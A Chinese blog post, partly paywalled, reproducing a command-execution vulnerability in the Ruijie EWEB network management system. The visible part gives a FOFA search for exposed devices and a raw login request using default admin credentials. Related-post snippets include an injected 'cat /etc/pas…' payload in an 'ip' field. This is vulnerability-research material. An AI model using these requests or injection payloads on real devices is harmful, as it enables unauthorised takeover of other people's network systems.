锐捷EWEB网管系统 RCE漏洞复现

已于 2023-12-02 20:32:00 修改
阅读量2.8k 收藏 12
点赞数 14
分类专栏: 漏洞复现 文章标签: 安全 web安全 网络
于 2023-12-02 20:13:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/134756614
版权

0x01 产品简介

  锐捷网管系统是由北京锐捷数据时代科技有限公司开发的新一代基于云的网络管理软件,以“数据时代创新网管与信息安全”为口号,定位于终端安全、IT运营及企业服务化管理统一解决方案。

0x02 漏洞概述

  Ruijie-EWEB 网管系统 flwo.control.php 中的 type 参数存在命令执行漏洞,攻击者可利用该漏洞执行任意命令,写入后门,获取服务器权限,进而控制整个web服务器。

0x03 复现环境

FOFA:app="Ruijie-EWEB网管系统"

127d55f3543a4249a89139605fe5dabb.png

0x04 漏洞复现 

获取admin用户有效cookie

POST /ddi/server/login.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 30
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

username=admin&password=admin?

了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 14
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
锐捷RG-UAC应用网关 前台RCE漏洞复现
0xSec
12-02 1434
锐捷RG-UAC应用管理网关 nmc_sync.php 接口处存在命令执行漏洞,未经身份认证的攻击者可执行任意命令控制服务器权限。
锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell
热门推荐
CCPxxxXxxx的博客
08-04 1万+
锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞 + GetShell 漏洞编号: CNVD-2021-09650 漏洞描述:锐捷NBR路由器 EWEB网关系统部分接口存在命令注入,导致远程命令执行获取 漏洞影响: 锐捷NBR路由器 EWEB网关系统 漏洞复现: 首先打开网关系统 然后在URL后面加 /guest_auth/guestIsUp.php,此路径为漏洞存在地。 我们打开hacker Bar,在Post data 输入 mac=1&ip=127.0.0.1|cat /etc/pas
锐捷网络股份有限公司NBR路由器EWEB网管系统存在命令执行漏洞(CNVD-2021-09650)——漏洞复现
2301_76437855的博客
06-11 442
锐捷网络股份有限公司是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等全系列的网络设备产品线及解决方案的专业化网络厂商。公开日期:2021-09-19漏洞编号:CNVD-2021-09650危害等级:高危漏洞描述:锐捷NBR路由器存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权。
锐捷EWEB网管系统RCE漏洞
一个努力学习网安的小牛马
05-11 698
锐捷网管系统是由北京锐捷数据时代科技有限公司开发的新一代基于云的网络管理软件,以"数据时代创新网管与信息安全"为口号,定位于终端安全、IT运营及企业服务化管理统一解决方案。使用cookie向/flow_control_pi/flwo.control.php?用post请求访问/ddi/server/login.php页面并提交admin参数可以获得管理员的cookie。在该系统的/flow_control_pi/flwo.control.php的文件中存在命令执行参数。
漏洞复现锐捷RG-EWEB-flwo.contro-远程命令执行
知黑而守白
07-10 39
锐捷睿易是锐捷网络针对商业市场的子品牌。拥有易网络、交换机、路由器、无线、安全、云服务六大产品线,解决方案涵盖商贸零售、酒店、KTV、网吧、监控安防、物流仓储、制造业、中小教育、中小医疗、中小政府等商业用户。锐捷 EWEB flwo.contro接口处存在RCE,恶意攻击者可能利用此漏洞执行恶意命令,获取服务器敏感信息,最终可能导致服务器失陷。
漏洞复现锐捷 EWEB auth 远程代码执行漏洞
qq_67810151的博客
03-26 465
锐捷 EWEB auth接口存在远程代码执行漏洞,未授权的攻击者可以通过该漏洞执行恶意命令,进而导致服务器失陷。
CNVD-2021-09650:锐捷NBR路由器(guestIsUp.php)RCE漏洞复现 [附POC]
薛定谔嘚喵博客
11-15 1067
锐捷网络是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等全系列的网络设备产品线及解决方案的专业化网络厂商。锐捷NBR 路由器系统存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,导致服务器失陷。
锐捷网管系统漏洞利用分析
weixin_74245209的博客
12-27 880
锐捷管理系统漏洞,利用此漏洞可获取后台密码。
锐捷无限地勘系统v1.2版本
04-10
锐捷无限地勘系统v1.2版本是一款专注于网络系统管理的专业软件,主要应用于地理信息系统(GIS)和无线网络规划与勘查。这个版本是开发者针对前期版本进行优化升级后的成果,旨在提供更高效、准确的无线网络解决方案...
RuijieRCE:锐捷锐捷网络RCE突破检测工具,可批量检测
03-06
瑞杰网络RCE漏洞检测工具,为方便渗透测试使用,可以批量检测,也会生成历史记录。同时也为防止他人恶意使用,可自定义GET参数密码,该密码由sha256加密,难以破解。 免责声明 由于传播,利用此文所提供的信息而造成...
锐捷无线地勘系统V1.2
07-05
锐捷无线地勘系统V1.2是一款专为IT专业人士设计的工具,主要用于无线网络的规划、勘查和设计。在无线网络部署日益重要的今天,该系统提供了高效且精确的解决方案,帮助用户确保无线网络覆盖的稳定性和性能。下面将...
锐捷商通奶茶管理系统V11安装视频教程
08-21
鉴于很多新手朋友不会安装锐捷商通系列软件,故而出此视频教程!仅供参考!
2023年江苏省网络系统管理赛项A模块真题
03-12
2023年江苏省网络系统管理赛项A模块真题,用于学习交流,禁止用于商用。 2023年江苏省网络系统管理赛项A模块真题,用于学习交流,禁止用于商用。 2023年江苏省网络系统管理赛项A模块真题,用于学习交流,禁止用于...
企业如何保证公司内网安全
最新发布
shunyou0526的博客
07-25 399
部署防火墙和入侵检测系统:作为内网安全的第一道防线,防火墙和入侵检测系统能够有效阻止外部攻击和恶意软件的入侵。访问控制与身份验证:实施严格的访问控制策略,结合多因素认证(MFA),确保只有授权用户才能访问关键系统和数据。日志管理:建立全面的日志记录和审计机制,对所有数据访问、修改、删除等操作进行记录,以便于追踪和分析。电脑监控软件:使用电脑监控软件来监控员工的屏幕活动、上网行为等,防止内部威胁和不当使用公司资源。反病毒软件与反间谍软件:部署反病毒软件和反间谍软件等恶意软件防护工具,实时监测和清除恶意软件。
微软蓝屏事件引发对构建更加稳固和安全网络环境的思考
lupai的博客
07-24 507
综上所述,构建更加稳固和安全网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 1305
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
大坝安全监测设备有哪些主要功能?
yyth13276363312的博客
07-24 401
12。3. **实时预警和报警处理**:提供精准的安全预警信息,及时处理可能的危险情况12。1. **实时监测大坝的各项物理参数**:包括应变、位移、水位、流量等12。6. **环境量监测**:包括上/下游水位、气温、降水量等11
锐捷路由器文件上传漏洞
08-13
对于锐捷路由器文件上传漏洞,我了解一些相关信息。锐捷路由器在过去曾存在一个文件上传漏洞,攻击者可以利用该漏洞上传恶意文件到路由器中,进而执行任意代码或者获取敏感信息。这个漏洞可能会导致网络受到攻击,进而威胁到用户的数据安全。 为了防止受到这个漏洞的影响,建议用户及时采取以下安全措施: 1. 及时更新固件:锐捷网络已经发布了修复该漏洞的固件版本。用户应该及时检查并更新路由器的固件,以确保系统具备最新的安全补丁。 2. 启用访问控制:用户可以通过启用访问控制列表(ACL)来限制路由器的访问权限,只允许信任的设备连接到路由器。 3. 强化密码策略:使用强密码,并定期更换密码,以防止未授权访问。 4. 禁用远程管理:如果不需要远程管理功能,最好将其禁用,以减少攻击面。 5. 防火墙配置:配置适当的防火墙规则,限制对路由器的访问和流量。 6. 定期备份:定期备份路由器的配置和重要数据,以便在发生安全事件时能够快速恢复。 请注意,这只是一些建议,并不能完全消除潜在的风险。如果您怀疑自己的路由器受到漏洞影响,建议及时联系厂商或专业人士进行进一步的检查和修复。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值